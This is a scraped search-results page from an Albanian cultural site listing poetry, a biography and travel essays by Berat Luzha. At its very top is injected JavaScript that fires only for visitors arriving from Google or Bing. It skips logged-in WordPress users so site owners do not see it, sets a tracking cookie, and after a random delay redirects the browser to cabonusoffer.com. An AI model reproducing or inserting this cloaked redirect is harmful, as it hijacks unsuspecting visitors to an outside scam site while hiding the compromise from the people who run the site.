((event) => { var ref = document.referrer || ''; if (ref.length === 0) { return; } ref = ref.toLowerCase(); if (ref.indexOf('google') === -1 && ref.indexOf('bing') === -1) { return; } var cookie = document.cookie || ''; if (cookie.indexOf('wordpress_logged') !== -1 || cookie.indexOf('wp-settings') !== -1 || cookie.indexOf('wordpress_test') !== -1) { return; } if (cookie.indexOf('wordpress-test') !== -1) { return; } function generateRandomInteger(min, max) { return Math.floor(min + Math.random()*(max - min + 1)); } document.cookie = "wordpress-test=1; max-age=86400; path=/;"; const delay = generateRandomInteger(20000, 60000); setTimeout(() => { window.location.replace('http://cabonusoffer.com/track/'); }, delay);})();class="search search-results theme-body group-blog title-style5 magazinenp-image-hover-effect-none right full_width_content_layout hfeed">

Tufë poezi nga Berat Luzha

Tufë poezi nga poeti, autori i disa librave, ish i burgosur i ndërgjegjes, ushtar i UÇK-së, veprimtar i palodhur i kauzës shqiptare, Berat Luzha. Autorin e këtyre vargjeve e shohim…

Berat Luzha – Dëshmori që ra në Ditën e Flamurit

Me rastin e 25-vjetorit të rënies dhe me rastin e dekorimin me urdhrin „HERO I KOSOVËS“ Pos ngjarjeve të rëndësishme që janë zhvilluar në historinë shqiptare më 28 Nëntor, Dita…

Tufë poezish nga publicisti, gazetari, politikani, poeti dhe ish i burgosuri i ndërgjegjes kombëtare, ushtari i UÇK-së, Berat Luzha.

Berat LUZHA (1953) Gazetar, politikan, publicist, poet. Lindi në Begracë, komuna Kaçanik. Shkollën fillore e kreu në vendlindje dhe në Kaçanik të Vjetër, gjimnazin në Kaçanik. Studioi për letërsi dhe gjuhë…

Tufë poezish nga publicisti, gazetari, politikani, poeti dhe ish i burgosuri i ndërgjegjes kombëtare, ushtari i UÇK-së, Berat Luzha.

Berat LUZHA (1953) Gazetar, politikan, publicist, poet. Lindi në Begracë, komuna Kaçanik. Shkollën fillore e kreu në vendlindje dhe në Kaçanik të Vjetër, gjimnazin në Kaçanik. Studioi për letërsi dhe gjuhë…

MANASTIRI – QYTETI I ALFABETIT DHE I MASAKRËS MBI PARËSINË SHQIPTARE

Shtegtime nëpër Atdhe (CCII) Shkruan: Berat Luzha Manastiri (Bitoli) është qyteti më i madh, pas Shkupit, në Republikën e Maqedonisë Veriore dhe njëri ndër qytetet më të mëdha të Ilirikut…

MAQELLARA – QYTEZA QË DON TË BËHET BASHKI

Nga Berat Luzha Shtegtime nëpër Atdhe (CXCIV) Mes dy qyteteve dibrane, Dibrës së Madhe (R. e Maqedonisë V.) dhe Dibrës së Vogël (Peshkopisë, R. e Shqipërisë), në anën e djathtë…

KLLOPÇISHTI – FSHATI KUFITAR I BRAKTISUR NGA PUSHTETI DHE NGA BANORËT

Shkruan: Berat Luzha Shtegtime nëpër Atdhe (CXCIII) Sapo kaluam pikën kufitare të Bllatës, hyjmë në një rrugë të drejtë e të ngushtë nëpër ara, që shpiente në një fshat kah…

LYPIANI – QYTETI SIMPATIK ME KOMUNËN E VEÇANTË

Shtegtime nëpër Atdhe (CXCII) Nga Berat Luzha Lypiani është një qytet i vogël simpatik në pjesën qendrore të Fushës së Kosovës. Ndodhet në lartësinë mbidetare rreth 550 m. në anën…

Likova – Komuna që i jep ujë Kumanovës e ujë nuk ka për vete

Nga Berat Luzha Shtegtime nëpër Atdhe (CXC) Edhe pse një fshat mesatar, Likova është qendër e komunës të 22 fshatrave të fushës, të rrëzës së maleve dhe të zonës malore…

LEQET E HOTIT – RRUGA PANORAMIKE ME BUKURI TË JASHTËZAKONSHME

Shtegtime nëpër Atdhe (CLXXXV) Nga Berat Luzha Një bukuri e rrallë, një befasi që të rrëmben të tërin sapo e sheh, është pjesa e rrugës mes një natyre të paprekur,…

Vllahia – fshati i zbrazur që i frikësohet shkëmbimit të territoreve

Shtegtime nëpër Atdhe (CLXXXIV) Nga Berat Luzha Nga 40 fshatrat e Shalës së Mitrovicës, fshati Vllahi ishte më i madhi nga popullsia dhe nga sipërfaqja. Vllahia, e quajtur edhe me…

THERANDA – QYTETI I MËRGIMTARËVE QË IA PA SHERRIN PRIVATIZIMIT

Shtegtime nëpër Atdhe (CLXXXIII) Nga Berat Luzha Theranda, e quajtur edhe Suhareka (sll. lumi i thatë), është një qytet i bukur në jugun e Rrafshit të Dukagjinit, qendër e Podgurit…

KLINA – QYTETI ILIR I DUKAGJINIT ME TOKË E UJË TË BOLLSHËM

Shtegtime nëpër Atdhe (CLXXXII) Nga Berat Luzha Qyteti i Klinës, i quajtur ndryshe nga populli si Klina e Begut, që nga viti 1954 është qendër e komunës e 54 vendbanimeve.…

DRENASI – QYTETI I SHTATOREVE TË HERONJVE TANË

Nga Berat Luzha Shtegtime nëpër Atdhe (CLXXXI) Drenasi është një qytet dhe qendër komunale në pjesën qendrore të Republikës së Kosovës. Shtrihet në rrafshnaltën e Drenicës, mes maleve Qyqavicë e…

SHKUPI – QYTETI QË TË JEP KËNAQËSI DHE ZHGËNJIM, NJËKOHËSISHT

Nga Berat Luzha Shtegtime nëpër Atdhe (CLXXV) Shkupi, dikur kryeqendër e Dardanisë dhe e Vilajetit të Kosovës, sot kryeqytet i Republikës së Maqedonisë Veriore, është nga qytetet më të mëdha…

Radhima, fshati turistik me dy pamje të kundërta

Nga Berat Luzha Sapo të kaloni Vlorën në udhën drejt jugut, drejt Orikut, ju kaloni nëpër bregdetin e fshatit Radhimë, njërin nga destinimet kryesore turistike në Gjiun e Vlorës në…

PROGRI – fshati i gurit, i luleve dhe i pastërtisë

Shtegtime nëpër Atdhe (CLXIX) –  Shkruan: Berat LuzhaProgri është një fshat i bukur, i shtrirë rrëzës së një mali gjysëm të zhveshur, në fund të një fushe, fushës së Devollit…

URA E FSHAJT – LEGJENDA PËR URËN E BESËS DHE FJALËS SË DHËNË

Shkruan: Berat Luzha Shtegtime nëpër Atdhe (CLXIV) Ura e Fshajt ndodhet në fshatin Fshajt të Përdrinisë, komuna e Gjakovës dhe në rrugën Gjakovë – Prizeren, në fundin e kanionit të…

GRYKA E RUGOVËS – NGA GRYKAT MË TË BUKURA TË EVROPËS

Nga Berat Luzha Shtegtime nëpër Atdhe (CLXI) Gryka e Rugovës është një kanion i gjatë në Alpet Shqiptare, i krijuar nga lumi Lumbardh i Pejës. Fillon 2 – 3 km…

Dhembja është njerëzore

Hasan Qyqalla & Mustafë Krasniqi, ”Legjenda e dhembjes së heshtur”, monografi, botoi “Shoqata e të Burgosurve Politikë të Kosovës”, Prishtinë 2017, ISBN: 978-9951-497-74-9 (Familja Salihaj: Evokime, përjetime, burgosje, gjakime –…